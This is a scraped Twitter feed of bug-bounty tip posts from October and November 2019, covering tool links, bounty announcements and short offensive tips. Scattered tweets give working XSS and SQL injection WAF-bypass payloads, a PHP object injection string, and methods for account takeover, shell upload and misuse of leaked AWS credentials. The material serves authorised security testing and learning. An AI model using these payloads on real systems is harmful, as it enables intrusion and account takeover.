7 I've been testing newer versions of #ffuf by @joohoi. It's dope being able to fuzz for files w/ 100 threads at 350reqs/sec w/ nearly no failures/stability issues! If you need BOTH stability & speed, then #ffuf is the only tool you need for web fuzzing. #bugbounty #BugBountyTip https://t.co/bWhywAAvVx
Ismayil Tahmazov
@Tismayil1


2019-11-10 18:20:10
5 Sometimes we have to do the impossible. SQL'Injection Attempt from Remote Site With this method: XSS, SQL'i, CSRF attacks can be done. Failure to filter the data from the remote source leaves open doors for such attacks. #bugbountytips #BugBountyTip #bugbounty #whitehat https://t.co/bb29oBdpGL
Infected Drake
@0xInfection


2019-11-10 13:33:03
8 Hey folks, v2.1.1 of XSRFProbe is out! \o/ So whether you're stuck at an endpoint with forms in it or looking to learn about how cross site request forgeries (CSRF) work, give this toolkit a try. 😉 https://t.co/OKUlxHNUO3 #infosec #appsec #bugbounty #bugbountytip https://t.co/5NMCR7YRMq
Halil AHMAD
@Halilahmadd


2019-11-10 11:04:00
3 Indispensable xss bypass payload. ">'><details/open/ontoggle=confirm('XSS')> #BugBounty #XSS #BugBountyTip #infosec
bugbountytip
@a_l_e_r_t_1_


2019-11-10 08:26:32
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5ryR3 #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
ALL ABOUT HACKER
@AboutHacking


2019-11-10 07:35:08
0 Cross Site Scripting attack Basic to advance [ part 6] Read:https://t.co/H4hJHhsdO5 #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/HkDrjRxblY
Shantanu Kulkarni
@Iamshantanukul


2019-11-10 06:58:55
0 If u can determine which opn source packages r usd in d application u r attacking ,u can download these n perform a code review or install them to experiment on. vulnerability in any of these may be exploitable to compromise d wider application #BugBountyTip #bugcrowd #hackerone
Hussein Daher
@HusseiN98D


2019-11-10 00:02:37
15 Sharing one of my secrets #BugBountyTip When discovering subdomains/domains/assets owned by a company, use the Google Analytics ID to expand your attack surface. The ID is in the HTML code. Reverse search then: https://t.co/fkWSWj8GUn RT once this helps!#bugbountytips #infosec
ALL ABOUT HACKER
@AboutHacking


2019-11-09 20:55:07
0 Cross Site Scripting Attack Series [ Baisc to Advance] Read: https://t.co/xZTIBcHlHr #cybersecurity #bugbounty #bugbountytip #bugbountytips #hacking https://t.co/QCQPhiYPtu
Murdockz
@Murdockz_CEH


2019-11-09 20:45:45
1 Remember this picture and date it was posted. When I share that I was rewarded XXXXX amount for a bug...you now know why. Step back learn and work hard to hit harder. 😎 #bugbountytips #bugbountytip #StayHumble https://t.co/69lsVZNGPt
Paulos Yibelo
@PaulosYibelo


2019-11-09 18:04:05
1 I started seeing posts about escalating bugs for maximum impact. This is an article I wrote about how to escalate XSS for maximum gain back in Feb 2018: https://t.co/W7sZLunr6N #BugBounty #BugBountyTip #BoomerAdvice
Avi
@avileox


2019-11-09 03:28:43
2 Small Python library that makes it easy to exploit race conditions in web apps with Requests https://t.co/bkBGTn8SNu #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-09 00:11:43
0 Less than 1$ (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Ismayil Tahmazov
@Tismayil1


2019-11-08 23:16:27
2 I Earned $XXXX OS Command Injection Private Program. Used Repos 1 : Dir Searcher : https://t.co/1L6MutcaEc 2 : Sub Scanner : https://t.co/ZRcZb6ovUa #BugBounty #bugbountytips #bugbountytip #whitehat https://t.co/OPOc6mVkTc
Ammar Amer🇾🇟
@cry__pto


2019-11-08 21:34:35
7 -Hacking for Beginners.pdf: https://t.co/aQoLE86OKL -HTB: CTF.pdf: https://t.co/PCbL2YSGZR -HTB_ Hackback.pdf: https://t.co/Jz1m0qlU2a -Keep Calm and Hack The Box - Devel.pdf: https://t.co/Jz1m0qlU2a #bugbountytips #Hacking #redteam #Pentesting #infosec #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-08 13:20:02
0 Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Brute Logic
@brutelogic


2019-11-07 23:37:34
1 Great stuff here, check this out! #bugbountytip #IDOR #BOLA https://t.co/2q0MbSeOie
Arif Khan
@payloadartist


2019-11-07 21:25:23
2 LiveTargetsFinder - tool to automate #bugbounty recon. #bugbountytip https://t.co/aP0oQC0qdr
Nick || hunt4p1zza
@ngkogkos


2019-11-07 17:47:02
0 Agree with Jason here, it is a good #bugbountytip but need to be cautious. I would only set up an AutoRepeater/Burp rule for true/false, if I was highly familiar with my test user's data and the website's behavior. #bugbounty https://t.co/iMVChw8zkX
Karna
@karna__1


2019-11-07 15:41:35
0 Burned out? Bored? Need a really cool time-pass? I dare you to enter https://t.co/sJMORd6dlX All the @PortSwiggerRes content are đŸ”„đŸ”„đŸ”„ Soo much to learn. Just go bring your geek-self out! #research #infosec #bugbountytip #bugbountytips #hackers #hacking #geeks
warbid
@id_warb


2019-11-07 14:41:19
0 Use PDO they said PDO will save you from SQL injections they said #bugbountytip https://t.co/NUtccgqMR7
intigriti
@intigriti


2019-11-07 13:04:04
18 Looking for business logic flaws 👀? Flows with multiple steps are a good place to start. Try to skip steps or execute them in a wrong order and see what happens 😈 Thanks for the #BugBountyTip, @InsiderPhD! https://t.co/bw6Z28K6fE
bugbountytip
@a_l_e_r_t_1_


2019-11-07 06:51:34
0 Now, recon tools are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
darkmage
@therealdarkmage


2019-11-06 22:22:45
0 Got a $50 Amazon giftcard for reporting an #XSS to a company with no #bugbounty program. #bugbountytip: If you find a bug on a website/app that does not appear to have an active program, take heart and have courage and faith! Report it and see if they can compensate youđŸ€˜#infosec https://t.co/2Kql2FconG
Vinothkumar
@vinothpkumar


2019-11-06 16:57:18
0 Wrote a blog on "Publicly Exposed AWS SNS Topics" #bugbounty #Bugbountytip #aws #security https://t.co/wfNbUHHpjT
Pavandeep
@Pavandep8


2019-11-06 16:12:14
2 Look what I shared: When I found iframe injection and illegal redirect (dom based) @MIUI| #Hacker #privacy #Bugbountytip #security https://t.co/TnU1JRjUDm
intigriti
@intigriti


2019-11-06 15:34:54
12 Sometimes, TRUE is all you need ✅. Use @Burp_Suite's match and replace to enable new functionalities in the UI and expand your attack surface! Thanks for the #BugBountyTip, @anshuman_bh! https://t.co/D55uMIl6Sx
Aditya Soni
@hetroublemakr


2019-11-06 14:43:08
0 Still any confusion about CVE2019 14287 Go and watch this video #infosec #Bugbountytip https://t.co/i4Mye3n7qO
Jinone
@jinonehk


2019-11-06 04:38:05
4 My first bounty blog post Get the full content of the private project internal network via ssrf https://t.co/MhKS2w6L0Z Thanks @Hacker0x01 #TogetherWeHitHarder #BugBounty #bugbountytip
Arif Khan
@payloadartist


2019-11-05 19:42:20
2 Very creative way to Abuse (cross-site authenticated) HEAD Requests leading to GitHub Oauth Bypass by @not_aardvark https://t.co/dX0lF2LVJ4 #bugbounty #bugbountytip
Abay
@abaykandotcom


2019-11-05 18:59:39
0 Actually these 2 findings are invalid. However, the interesting part is where and how the XSS payload is triggered~ #ripenglish #XSS #bugbountytip #bugbounties #bugbounty https://t.co/idpR2U41zn
YogoshaOfficial
@YogoshaOfficial


2019-11-05 16:10:19
5 [#Bugbountytip] Tomcat is used, yet, port 8080 filtered? use port 8009 which is forgotten “often”. It uses AJP instead of HTTP so use your local apache as local proxy to convert traffic from HTTP to AJP. ProxyPass / ajp://target-ip:8009/ ProxyPassReverse / ajp://target-ip:8009/
Felix Kybranz
@_cybrg


2019-11-05 12:53:54
0 Got too many results from google dorks? Remove uninteresting buzzwords with: "-" site:http://paypal. com -demo -Capital Why did I miss that for so long!? Finding that was a nice wtf-moment😇 #BugBounty #bugbountytips #bugbountytip #bugbounties
m0z
@LooseSecurity


2019-11-05 12:05:14
6 #BugBounty #bugbountytip #XSS Have an XSS and want to get account takeover but document.cookie isn't working? Try a payload which grabs the CSRF token, and then sends a request to the change email endpoint to change it to your email! Now your bug is twice as valuable. ;)
bugbountytip
@a_l_e_r_t_1_


2019-11-05 07:39:35
0 Reflected XSS on Magento #BugBountyTip #BugBountyTips https://t.co/KQSpPV2Q0m via @YouTube
Anshuman Pattnaik
@anspattnaik


2019-11-05 00:29:38
0 #bugbountytip #Google I got a strange thing to know that if google user gives certain access to a third party application then as per google policy guidelines that third application has complete ownership of the user's private information such Gmail, Drive and other services.
(((Gamliel)))
@Gamliel_InfoSec


2019-11-05 00:19:18
0 If u are pentesting/bug hunting in some web app that uses JSON and it runs on IIS, don't forget to test "JSON Parameter Pollution". Under some conditions u can poisoning some parameters, break Javascript context and voilĂĄ ... #XSS #hack2learn #GivingBack2Community #BugBountyTip https://t.co/MjN3o8pVgH
m0z
@LooseSecurity


2019-11-04 22:46:32
3 Here's a useful #XSS payload which doesn't suffix "prompt" with any parenthesis! Object.defineProperty(window, 'p', { get: prompt });p; By using a Getter, we invoke the prompt without any input! Ideal for bypassing WAF! #BugBounty #bugbountytips #bugbountytip #bugbounties
bugbountytip
@a_l_e_r_t_1_


2019-11-04 21:22:01
0 Now, recon tools are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Ashish Kunwar
@D0rkerDevil


2019-11-04 15:32:18
1 Found Java_rmi service on port 8001 , used nmap "rmi dumregistery" script to dump the class path Found some goodies .. #bugbounty #bugbountytips #bugbountytip #security
KNOXSS
@knoxss_me


2019-11-04 13:46:16
1 One of #KNOXSS exclusive features! #XSS #bugbountytip https://t.co/SDP6thBcrz
Ashish Kunwar
@D0rkerDevil


2019-11-04 12:21:16
1 #bugbountytip look out for port 2181 - zookeeper , check if you are able to commands , as there is no auth in place by default in zookeeper installations. #bountytip #bugbountytips #protips #bugbounty #security
Leonel Emiliano
@leoalgare


2019-11-04 12:09:59
0 POST request with json body with no csrf token but also no CORS ? Always test change the content-type to urlencoded... It works like a charm. #bugbountytips #bugbountytip #hackerone #CSRF #Hacker0x01
Milind Purswani
@MilindPurswani


2019-11-03 17:38:13
0 Had a pyserver running on my VPS for days. Shodan scanned it and saved the response lol. Is this how "karma" works? #bugbountytip
VT10 Loading đŸ„ŠđŸ„ŠđŸ”„đŸ”„đŸ”„
@SHIVAPURI12


2019-11-03 17:10:49
1 #MegaStar Lu oorike ayiporu,, aaaaah style,,,aaah energy ,, aaah Grace,, Ever green and Irreplaceable ,, #BossForAReason #MegaStatChiranjeevi Garu â€ïžđŸ’“â€ïž at #bugbountytip finals,, #EmperorOfEntertainment #MegaStar #ChiruForEver Thanks to @StarMaa
Maulik Vaidh🇼🇳 @bsidesahmedabad
@Maulik1827


2019-11-03 15:46:18
0 @bsidesahmedabad 12 Days to go... Are you excited?😃😃 #bsides #bsidesahmedabad #bugbountytip #infosec #hacking #security #conference #BugBounty https://t.co/EjmNa9ukkn
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 🎃
@spyerror


2019-11-03 04:19:08
7 cloudflare {`XSSÂŽ} «byPASS» payloads. @spyerror🎯 đŸ„‡ $cat /<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> đŸ„ˆ $cat /<svg%0Aonauxclick=0;[1].some(confirm)// #BugBounty #BugBountyTip #WAF #infosec
Ismayil Tahmazov
@Tismayil1


2019-11-02 20:11:49
0 Bug Reported to Author. 8K+ Active sales. Script after redirect worked admin account then stored to fortend area. #bugbounty #bugbountytips #bugbountytip https://t.co/6N1XwtnN28
Ismayil Tahmazov
@Tismayil1


2019-11-02 20:10:10
0 CodeCanyon Most Popular Item. Found : CSRF -> Stored XSS. 1 - HTML form auto submit to : admin/knowledge_base/article 2 - Payload direct worked after redirect. 3 - Admin area and Fronted area payload stored. 2/1 #bugbounty #bugbountytips #bugbountytip https://t.co/RiUgDz9GHq
Arif Khan
@payloadartist


2019-11-02 18:55:25
1 Good read: Smuggling HTTP requests over fake WebSocket connection by @0ang3el https://t.co/x1CxQyCq7u #bugbounty #bugbountytip
Arif Khan
@payloadartist


2019-11-02 16:21:33
2 Nice write up by @nj_dav on Abusing HTTP hop-by-hop Request Headers https://t.co/cEB4iFqnOG #bugbounty #bugbountytip
Fisher
@Regala_


2019-11-02 14:28:40
2 Making the most out of live hacking events 101: 📚 Focus on learning đŸ‘„ Meet, connect and collaborate 💯 Give your absolute best always đŸ„ł Have fun and enjoy #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-02 14:27:54
1 Now, Jenkins and Jira vulns are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Arif Khan
@payloadartist


2019-11-02 13:26:40
6 Nice write up by @daveysec on Abusing HTTP hop-by-hop Request Headers https://t.co/3VwrseBOta #bugbounty #bugbountytip
Andri Wahyudi 📂
@andripwn


2019-11-02 09:41:01
0 Remote Code Executions (RCE) - Bypassing Extension .png Private_Programs on @Hacker0x01 sad this duplicate :'( #bugbounty #bugbountytip #rce https://t.co/oMPTakOseD
Nikhil Mahajan
@mahajan344


2019-11-02 09:01:49
1 Thanks @detectify for another payout. #bugbountytip : If you have a vulnerability and that can be validated on the fly, try to automate that bug with #detectify scanner. With the help of automation, you don't have to worry about target :) #bugbounty #automation #ItTakesACrowd https://t.co/LjTNwXk5Ol
bugbountytip
@a_l_e_r_t_1_


2019-11-01 17:32:16
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-01 09:20:33
1 #SWAG 🏆🏆 Symantec 🏆🏆💰💰 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/EQfIvhpHD0
Ismayil Tahmazov
@Tismayil1


2019-11-01 07:25:06
0 Yes I Awarded $XXX. @instra Thanks For Bounty. #bugbounty #bugbountytip #bugbountytips
dark_warlord14
@dark_warlord14


2019-10-31 16:25:28
0 One must read blog post for beginners like me. Hats off to the author. #bugbountytips #bugbountytip https://t.co/ZtjGcCmSIz
Arif Khan
@payloadartist


2019-10-31 16:04:44
1 Wanted to add more juice to your #bugbounty recon? Grab this while its hot!!! Pricing is down to $10 from $50. Bonus - if u use my referral code, c5df8625, both of us get 500 credits more!!! #bugbountytip #halloween2019 https://t.co/WWbHqqLSHo
sagar yadav
@sagaryadav8742


2019-10-31 13:01:27
0 Happy to secure @readmeio 😍 Soon I will get a nice #swag from https://t.co/zcDAQyTUV0 Program link :- https://t.co/eRXN5RdYW0 #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 https://t.co/NrtLkkroHi
sagar yadav
@sagaryadav8742


2019-10-31 12:52:27
0 @zerocopter swag 😍 Happy to #secure #zerocopter #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 #swag https://t.co/RSdeOn5Kjb
Hussein Daher
@HusseiN98D


2019-10-31 11:01:04
0 Please RT and add your suggestions #bugbounty #infosec #bugbountytip #bugbountytips
Max
@0xw2w


2019-10-31 09:52:20
0 Found a changing session cookie, that applying to the user’s session during login to the account? Try logout CSRF + cookie setting (using XSS/CRLF inj/etc) to takeover a session when the user entered login and password again #bugbountytip #bugbounty #infosec
jub0bs
@jub0bs


2019-10-31 07:38:46
0 #bugbountytip Go deep on recon; go broad on targets.
Samet ƞAHİN
@sametsahinnet


2019-10-31 05:44:47
0 Here a Google dork for finding ports ; inurl:"https://t.co/q4DIBVJDSJ" #BugBountytip #bugbounty #bugbountytips #Hacking #TogetherWeHitHarder https://t.co/UWdzDXZyhf
(((Gamliel)))
@Gamliel_InfoSec


2019-10-31 04:00:38
0 Added to Fav and waiting to test in a new project. #infosec #hacking #bugbountytip #pentesting #oneliner https://t.co/M5HhlBC8uI
Akshansh Jaiswal
@Akshanshjaiswl


2019-10-31 01:22:25
0 Yay, I was awarded a $1,000 bounty on @Hacker0x01! Account takeover->Make victim login to attacker's account->Make victim account unable to login to his orignal account. https://t.co/JKjOn6nSaA #TogetherWeHitHarder #bugbounty #bugbountytip https://t.co/26tKODyKX4
Shaked Klein Orbach đŸ‡źđŸ‡±
@shakedko


2019-10-30 23:10:37
0 Many times I end up finding a test.php with "Size: 0". I tend to assume that it's there for something, so most likely I will have to guess some parameters. I tried parameth but it didn't work well. Other ideas? #BugBounty #BugBountyTip CC @joohoi - using ffuf
Mohamed R Serwah
@serWazito0


2019-10-30 22:58:55
0 😅 any idea to get privilege escalation after login to ftp using anonymous username ?? #bugbountytip
Ismayil Tahmazov
@Tismayil1


2019-10-30 22:23:15
0 New Fast Subdomain Scanner My First GO experience. Your feedback is important to me. Hopefully it benefits your business. https://t.co/2o2pfa8Pi1 #bugbounty #bugbountytip #bugbountytips https://t.co/HHgGwcRfJ9
bugbountytip
@a_l_e_r_t_1_


2019-10-30 17:57:48
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
m0z
@LooseSecurity


2019-10-30 17:41:20
4 A lot of Self XSS is actually just POST XSS. Check if it has a CSRF token! Use your CSRF bypassing techniques to convert it. I've done this before, turned a useless self xss into a $1,000 vulnerability! Stored self XSS? Try a login CSRF chain! #BugBounty #bugbountytip
Dhamu
@Dhamu_offensi


2019-10-30 16:51:04
0 #bugbountytip #bugbounty Don't use Automated exploit tools regarding CVE-2019-11510 - Pre-auth Arbitrary File Reading. Again I try to manually exploited successfully Data breach staff username and password via Pulse Secure Access. https://t.co/3QcJly45ez
Brute Logic
@brutelogic


2019-10-30 14:50:08
2 POI - #PHP Object Injection Leading zeroes & Arbitrary Chars Example: O:008:"stdClass":0001**s:006:"bypass";b:1;} (almost anything can be used in ** ) #bypass #bugbountytip https://t.co/A1dymKmBXV
Jake
@JCyberSec_


2019-10-30 12:00:16
0 I shall test your theory :: #bugbountytip - Don't share your #bugbountytips on Twitter as others will take your methods/tip and leave you with nothing đŸ’°đŸ’°đŸ’” https://t.co/OjTno2m0E1
Ismayil Tahmazov
@Tismayil1


2019-10-30 10:17:36
0 #bugbountytips Private Program Subdomains scanned with : https://t.co/LegySAU3sZ Found new subdomain https://t.co/bLxxHsKcuc -> ApacheTomcat 1 - Dirs scanned found dir : /files/ 2- PUT method tested and worked. 3 - Shell Uploaded. Bounty : $XXX #bugbounty #bugbountytip https://t.co/8BL8bWvETi
Learner
@LearnerHunter


2019-10-30 08:26:48
1 Here is my 3rd blog post -> https://t.co/MEIkF0X64m @TipsBug #bugbountytip Thanks
Ravindra Sisodia
@InfoSecRavindra


2019-10-30 04:22:08
1 #bugbountytip Always use -b flag in sublist3r, always.
Abdelrhman
@OufZayed


2019-10-30 02:38:45
0 Subdomains Enumeration Cheat Sheet | via:@PentesterLand https://t.co/muezGpC4xg | #recon #bugbountytip
m0z
@LooseSecurity


2019-10-30 00:49:12
0 We're now at 500 members! #BugBounty #bugbountytip #bugbountytips #bugbounties https://t.co/VAYxaqFQNI
đŸ‘»in🐚
@0xerror


2019-10-29 22:45:18
0 SQLi News: @brutelogic: 'Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip ' https://t.co/LCr62t6TKq, see more https://t.co/LbVOSRg1RN
Security Executions Code
@pwn0sec


2019-10-29 20:58:39
0 Information security & Penetration testing new facebook https://t.co/eW4Eo49aMC #bugbounty #bugbountytip #ssrf
Ismayil Tahmazov
@Tismayil1


2019-10-29 20:37:49
0 Application webview URL injection. APK decompiled and scanned. Founded function : goSupport( url ) Created test for injection : com.example.auth://https://t.co/mJqV80lTKH Result : Application opened then webview redirect to my url. #BugBounty #bugbountytip #bugbountytips https://t.co/3CAwg0cnsO
bugbountytip
@a_l_e_r_t_1_


2019-10-29 18:39:22
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-29 18:29:19
7 Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-29 17:09:22
0 The Web In Depth https://t.co/juiE7cWi2g Follow Us 💰💰💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-29 17:06:03
0 How To Become A Hacker Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/iYO8p512I4
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-29 17:00:50
0 Microsoft Tackles Election Security with Bug Bounties Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity #hackerone https://t.co/QIBjof1ffv
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-29 16:57:03
0 Bug Bounty — Tips / Tricks / JS (JavaScript Files) #Bugbounty #BugBountyTip #BugBountyTips https://t.co/GTENhwO3Qz
Avinash Jain
@logicbomb_1


2019-10-29 16:11:31
4 For developers- While developing apps with Spring boot, make sure you don't publically expose below endpoints. For Pentesters/Bug Bounty hunters- Check for below endpoints, it may contain sensitive information. #infosec #bugbounty #bugbountytip https://t.co/B5GJNJ6U4g
Shantanu Kulkarni
@Iamshantanukul


2019-10-29 14:20:45
0 Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` Thanks to @rodoassis #SQLi #bypass #bugbountytip #bugbounty #hackerone #bugcrowd
Brute Logic
@brutelogic


2019-10-29 14:16:22
36 Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip https://t.co/f7tKJFOcGs
Harshal
@Harshal81835744


2019-10-29 10:32:31
0 cloudflare «XSS» payload to bypass protection. {` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> Ž} #BugBounty #BugBountyTip #WAF #infosec
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-29 09:02:16
5 Bug Bounty — Tips / Tricks / JS (JavaScript Files) Follow Us Bug Bounty $$$$-- https://t.co/iNczOcGmCt https://t.co/GTENhx5EI7 #BugBounty #BugBountyTip #JS #PenetrationTesting #pentesting #devops #devsecops #cybersecurity
Sayaan Alam
@alamsayaan


2019-10-29 04:51:56
0 It was Really a Long Way.... Finally On Google HOF @GoogleVRP #bugbounty #bugbountytips #togetherwehitharder #bugbountytip #hacking https://t.co/tB7cG6Ylyu
tololovejoi
@tolo7010


2019-10-29 03:29:31
0 Vulnerability gets your report triaged. Impact gets your report rewarded #bugbounty #bugbountytip #bugbountytips
bugbountytip
@a_l_e_r_t_1_


2019-10-29 01:17:49
0 Now 25+ download thank you. Learn & Hack & Earn more money. Good Hacking... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Brute Logic
@brutelogic


2019-10-28 14:19:16
19 Just an obfuscated alternative to alert(1): https://t.co/JzLTOrQIgp`javas\cript:al\ert(1)` PoC: https://t.co/Xpca5KfJtf #XSS #bugbountytip
Mohamed Sayed
@FlEx0Geek


2019-10-28 12:10:44
2 Topic about Open redirect https://t.co/DfW5qOqhg5 #BugBounty #bugbountytip
Mohamed Sayed
@FlEx0Geek


2019-10-28 12:10:24
0 Topic about Open redirect https://t.co/uBte9Ledhr #BugBounty #bugbountytip
Guhan Raja (àź•àŻàź•àź©àŻ àź°àźŸàźœàźŸ)
@havocgwen


2019-10-28 11:49:19
0 Check API requests by adding an invalid parameter sometimes it will be reflected as error in HTML and leads to XSS :) #bugbounty #bugbountytip #API #xss
PikaChu
@intx0x80


2019-10-28 10:15:37
0 PHP Execution 0-Day Discovered in Real World CTF Exercise https://t.co/VPLYXj5f1u #bugbountytip
ΛяĐČєη
@spenkkkkk


2019-10-28 09:32:16
0 Does subdomain takeover work for https://t.co/3MKBF2BrBG? #bugbounty #bugbountytip
Sayaan Alam
@alamsayaan


2019-10-28 06:35:00
0 Does anyone know what is going on here... I'm getting multiple profiles of Google HOF @GoogleVRP #bugbounty #bugbountytip #bugbountytips #bugbountyhelp #togetherwehitharder #google #hacking https://t.co/VOPcbCghWi
miraitowa
@miraitowa1


2019-10-28 00:26:07
1 Hacking JSON Web Tokens (JWTs) by @vickieli7 https://t.co/xR60oBxe7d #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-27 21:17:25
1 Now 25+ download thank you. Learn & Hack & Earn more money. Good Hacking... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Mahmoud Osama
@Mahmoud0x00


2019-10-27 16:34:59
3 #bugbountytip if you could to reach out to AWS credentials, Configure them in your terminal and then list s3 buckets `aws s3 ls` look for buckets with `AMAZON_SES_SETUP_NOTIFICATION` file, then you will have access to all emails got sent to this email + Ticket trick,You are in!!
Hendrik
@hendrikvb


2019-10-27 13:21:54
0 Silly @Burp_Suite trick of the day: Use advanced scope control for auto-scoping and unscoping, based on regex for ports, files, ports and protocols. #Burp #bugbountytip
SΛKYB
@sakyb7


2019-10-27 08:22:50
0 Hey guys, having hard time to understand http smuggling request.. portswigger web security challenge Video solutions: https://t.co/hZ8CGt6V61 (Basic CL TL Vulnerability) Find all solutions on this YT channel #bugbountytip #bugbounty
tololovejoi
@tolo7010


2019-10-27 01:55:07
0 Security is not so hard. You just need to know the concept #bugbounty #bugbountytip
Learner
@LearnerHunter


2019-10-27 01:06:18
1 Hello friends here is my new blog post in Bug Bounty Writeup Summary -> Please give suggestions/ideas after read Thanks https://t.co/wm0JvWB6Qt #bugbountytip #bugbounty
m0z
@LooseSecurity


2019-10-26 17:43:52
0 The best hacking tool is your brain. Train it! :D #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-26 16:44:55
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Sayaan Alam
@alamsayaan


2019-10-26 13:38:23
0 @lcblnc I had found a domain where Access control allow origin - true X frame option - sameorigin... Is it exploitable ...if yes then how.. #bugbounty #bugbountytips #bugbountytip #togetherwehitharder
bugbountytip
@a_l_e_r_t_1_


2019-10-26 13:06:43
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-26 10:06:16
3 free udemy courses for a limited time: -1-Master in Hacking with Metasploit: https://t.co/I25d3rBV6r -2-master object oriented php by building a web-application: https://t.co/5wJKzj2Tf0 #bugbountytip #hacking #pentest #cybersecurity #RedTeam #infosec
bugbountytip
@a_l_e_r_t_1_


2019-10-26 08:30:57
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
epxil0n
@lcblnc


2019-10-26 08:10:29
0 ClickJacking is present when these two headers are found. Access-Control-Allow-Origin: * X-Frame-Options: SAMEORIGIN #bugbountytips #bugbountytip #bugbounty
dark_warlord14
@dark_warlord14


2019-10-26 07:51:40
0 Scored my first bounty today on @Hacker0x01. Thank you @zseano @TomNomNom @brutelogic @NahamSec @s0md3v . Your work and notes have helped me to achieve this. #bugbountytip #bugbountytips https://t.co/2uJdRMwnGu
tololovejoi
@tolo7010


2019-10-26 05:36:02
